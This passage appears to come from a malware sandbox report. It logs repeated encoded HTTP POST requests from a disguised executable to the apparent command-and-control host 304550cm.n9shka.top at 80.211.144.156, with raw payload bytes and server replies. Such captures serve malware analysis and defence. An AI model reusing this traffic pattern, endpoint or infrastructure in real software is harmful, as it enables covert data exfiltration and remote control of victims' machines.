                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:40.478424072 CEST2532OUTData Raw: 5e 5d 59 52 5a 5f 5e 5f 5c 5a 51 56 57 5e 57 54 50 59 5e 5d 54 5e 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]YRZ_^_\ZQVW^WTPY^]T^SHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/2%Z= 8]>Y3?_,#%)+5>1X<5?$$ .;#G X/5
                                                          Sep 8, 2024 11:52:40.812889099 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:41.021652937 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.46473080.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:41.161562920 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:41.509675026 CEST2532OUTData Raw: 5e 5b 5c 51 5f 5e 5b 58 5c 5a 51 56 57 5a 57 55 50 5f 5e 5c 54 5e 53 47 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^[\Q_^[X\ZQVWZWUP_^\T^SGTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&,2%** 7V$>$),'T3'".><5'0_.#G X/%
                                                          Sep 8, 2024 11:52:41.846086025 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:42.048048019 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:41 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.46473180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:42.167792082 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:42.525207043 CEST2532OUTData Raw: 5e 5c 5c 53 5a 5d 5b 51 5c 5a 51 56 57 53 57 5d 50 58 5e 59 54 5b 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^\\SZ][Q\ZQVWSW]PX^YT[SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%/->), 00X)X'Y&;3!==_(&,0'.;#G X/


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          42192.168.2.46473280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:42.844446898 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:43.197671890 CEST1412OUTData Raw: 5b 5a 59 55 5f 5d 5b 51 5c 5a 51 56 57 5d 57 50 50 51 5e 5c 54 55 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [ZYU_][Q\ZQVW]WPPQ^\TUSDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%/2">_?X43,=<]'/=,?T$*7#.5+&?Y34(9;#G X/9
                                                          Sep 8, 2024 11:52:43.530021906 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:43.725656986 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 25 0a 30 3f 00 03 21 10 06 0f 3d 3f 2d 12 2c 2e 24 11 3d 00 35 45 3d 0d 30 11 3e 01 36 12 3e 38 2d 45 3d 3f 24 11 20 21 02 04 27 35 28 5e 03 11 20 06 36 2e 3d 07 29 39 0b 01 3e 0f 34 1b 29 2f 01 5a 22 42 2b 0e 34 2b 38 1c 34 3b 2a 14 3f 17 00 12 2f 24 26 1d 39 0a 32 57 21 0e 2d 57 0c 12 23 09 28 2e 2b 53 34 30 29 5f 25 2d 29 12 30 25 36 5e 3e 06 07 0e 3c 16 3a 5c 25 0b 28 0c 26 3e 21 5f 3d 01 22 5f 33 39 37 5a 23 2d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: %0?!=?-,.$=5E=0>6>8-E=?$ !'5(^ 6.=)9>4)/Z"B+4+84;*?/$&92W!-W#(.+S40)_%-)0%6^><:\%(&>!_="_397Z#-$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          43192.168.2.46473380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:42.966285944 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:43.322120905 CEST2532OUTData Raw: 5e 5c 59 54 5a 59 5b 5e 5c 5a 51 56 57 59 57 5d 50 50 5e 50 54 55 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^\YTZY[^\ZQVWYW]PP^PTUSHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^8W:?940?)<,'1_,'#0: !(6'^9;#G X/)
                                                          Sep 8, 2024 11:52:43.654217958 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:43.792609930 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          44192.168.2.46473480.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:43.917943954 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:44.275228977 CEST2532OUTData Raw: 5b 5d 5c 55 5a 58 5b 59 5c 5a 51 56 57 5a 57 51 50 5f 5e 51 54 5d 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: []\UZX[Y\ZQVWZWQP_^QT]SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%[/!=+40X)?3Y%<*8'7V')'#.-[)6$&$ [/;#G X/%
                                                          Sep 8, 2024 11:52:44.583265066 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:44.717046022 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          45192.168.2.46473580.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:44.840869904 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:45.197648048 CEST2532OUTData Raw: 5e 5c 5c 54 5f 5a 5e 58 5c 5a 51 56 57 5d 57 52 50 5e 5e 5c 54 55 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^\\T_Z^X\ZQVW]WRP^^\TUSDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\;"&>4 3(?7_0?6/+'(6.)?@#3$ Z9#G X/9
                                                          Sep 8, 2024 11:52:45.506228924 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:45.636684895 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          46192.168.2.46473680.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:45.769434929 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:46.118974924 CEST2532OUTData Raw: 5e 59 5c 50 5a 5f 5b 5c 5c 5a 51 56 57 52 57 5d 50 59 5e 50 54 55 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^Y\PZ_[\\ZQVWRW]PY^PTUSHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\;":)+!0$Z*<'=[-4R':'"5?&#[&'4:;#G X/
                                                          Sep 8, 2024 11:52:46.430526972 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:46.560022116 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          47192.168.2.46473780.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:46.685189009 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:47.040894032 CEST2528OUTData Raw: 5b 5c 5c 54 5f 5e 5b 5a 5c 5a 51 56 57 5b 57 54 50 50 5e 5f 54 5d 53 42 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [\\T_^[Z\ZQVW[WTPP^_T]SBTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&;!.*97 V#>Z7\'?)_-'<$("X-? 3':+#G X/%
                                                          Sep 8, 2024 11:52:47.355787992 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:47.486373901 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:46 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          48192.168.2.46473880.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:47.606170893 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:47.962707996 CEST2532OUTData Raw: 5e 5a 5c 51 5a 53 5b 5e 5c 5a 51 56 57 5e 57 51 50 59 5e 5f 54 5e 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^Z\QZS[^\ZQVW^WQPY^_T^SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\8W1^=_+X7>739^;$%:+^5?@;^$/+#G X/5
                                                          Sep 8, 2024 11:52:48.303637981 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:48.436470985 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:47 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          49192.168.2.46473980.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:48.559653044 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          50192.168.2.46474080.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:48.734797001 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1372
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:49.087934971 CEST1372OUTData Raw: 5b 5e 5c 57 5f 58 5e 5a 5c 5a 51 56 57 5b 57 51 50 5d 5e 51 54 5b 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [^\W_X^Z\ZQVW[WQP]^QT[SHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%Z.!>>) 0*,#\$9[;B7';!.)&Z$4(/+#G X/1
                                                          Sep 8, 2024 11:52:49.405402899 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:49.534224033 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 26 53 26 3f 0f 59 22 10 30 0c 2a 2f 2d 1c 2d 2e 38 13 2a 3a 31 07 2a 0d 37 0a 29 3f 29 07 2a 05 29 07 2a 3c 2c 5f 20 0f 2f 5b 26 1f 28 5e 03 11 20 02 22 07 26 10 3d 00 3d 06 2a 0f 33 05 29 59 3f 1f 35 1d 2f 0c 23 5d 2b 07 37 2b 35 0e 3f 07 25 0f 2c 24 0f 41 2f 23 08 55 21 34 2d 57 0c 12 23 0b 3c 2e 23 14 37 0a 25 5d 25 07 29 11 33 08 00 59 2a 28 0c 13 28 2b 26 5c 31 0c 37 12 26 2d 39 58 2a 38 2a 5d 24 07 01 5a 22 2d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: &S&?Y"0*/--.8*:1*7)?)*)*<,_ /[&(^ "&==*3)Y?5/#]+7+5?%,$A/#U!4-W#<.#7%]%)3Y*((+&\17&-9X*8*]$Z"-$S-"T=\V


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          51192.168.2.46474180.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:48.857590914 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:49.212735891 CEST2532OUTData Raw: 5b 58 5c 52 5f 5f 5b 5f 5c 5a 51 56 57 5f 57 52 50 5d 5e 5d 54 5d 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [X\R__[_\ZQVW_WRP]^]T]SDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&.!=]*,#Z=<3]$=\/#%95*+68&$#9#G X/1
                                                          Sep 8, 2024 11:52:49.531940937 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:49.663022041 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:49 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          52192.168.2.46474280.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:49.794887066 CEST295OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:50.150235891 CEST2532OUTData Raw: 5b 59 5c 55 5a 5f 5e 58 5c 5a 51 56 57 5d 57 56 50 5a 5e 5a 54 5f 53 42 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [Y\UZ_^X\ZQVW]WVPZ^ZT_SBTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^/2:>9 <=<'";7W3X6->(6'Y$<9#G X/9
                                                          Sep 8, 2024 11:52:50.471239090 CEST25INHTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:50.670878887 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          53192.168.2.46474380.211.144.15680764C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 8, 2024 11:52:50.795362949 CEST319OUTPOST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:51.150543928 CEST2532OUTData Raw: 5b 5d 59 56 5a 5b 5e 5a 5c 5a 51 56 57 59 57 5d 50 5f 5e 5b 54 5f 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
